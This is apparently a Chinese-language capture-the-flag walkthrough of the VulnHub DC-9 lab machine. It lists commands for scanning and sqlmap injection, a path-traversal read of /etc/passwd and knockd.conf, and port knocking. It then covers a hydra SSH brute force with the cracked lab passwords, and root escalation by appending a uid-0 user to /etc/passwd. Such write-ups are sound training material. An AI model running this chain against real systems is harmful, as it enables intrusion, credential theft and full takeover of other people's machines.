靶机地址
https://www.vulnhub.com/?q=dc-
打开靶机,设置为同一种nat模式
kali 信息收集主机发现 ,并扫描该主机ip
arp-scan -l
nmap -p- -sV 192.168.1.201
访问192.168.1.201,在search界面可尝试sql注入,用burp抓包,尝试注入
使用sqlmap注入(路径自定义)
附在线破解网站:https://hashes.com/en/decrypt/hash
python sqlmap.py -r sql.txt --dbs
python sqlmap.py -r sql.txt -D users --tables
python sqlmap.py -r sql.txt -D users -T UserDetails --columns
python sqlmap.py -r sql.txt -D users -T UserDetails -C "username,password" --dump
无法登录,重新查找其他数据库,查找到admin transorbital1
python sqlmap.py -r sql.txt ‐D Staff ‐T Users ‐C Username,Password ‐‐dump
登录页面后,发现可能为文件包含漏洞,?file=…/…/…/…/etc/passwd 无有效信息,
查看knock配置文件?file=…/…/…/…/etc/knockd.conf
关于knock 讲解链接https://blog.csdn.net/nzjdsds/article/details/112476120
进行敲击,发现ssh可以连接
for x in 7469 8475 9842;do nmap -Pn --max-retries 0 -p $x 192.168.1.201;done
之前的用户密码分别保存,hydra爆破
hydra -L /root/桌面/1.txt -P /root/桌面/2.txt ssh://192.168.1.201
通过ssh登录在,janitor的家目录存在secrets-for-putin的文件中存在密码
重新爆破
[22][ssh] host: 192.168.1.201 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.1.201 login: janitor password: Ilovepeepee
[22][ssh] host: 192.168.1.201 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.1.201 login: fredf password: B4-Tru3-001
ssh登录fredf,查看有root权限的文件,后发现test可以执行,执行
在上级目录查看test.py
脚本内容为将文件内容添加到另外一个文件内容
可以添加一个新的用户到/etc/passwd,然后新添加的用户登陆
Openssl来对密码进行加密,在进行编辑输入到/tmp/new-passwd,最后登录dc9,查看flag
fredf@dc-9:/opt/devstuff/dist/test$ openssl passwd -1 -salt dc9 123456
$1$dc9$3Qf9B8VT49B741CMh3R4m1
fredf@dc-9:/opt/devstuff/dist/test$ echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1
fredf@dc-9:/opt/devstuff/dist/test$ echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1:0:0:root:/bin/bash' >> /tmp/dc9
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/dc9 /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su dc9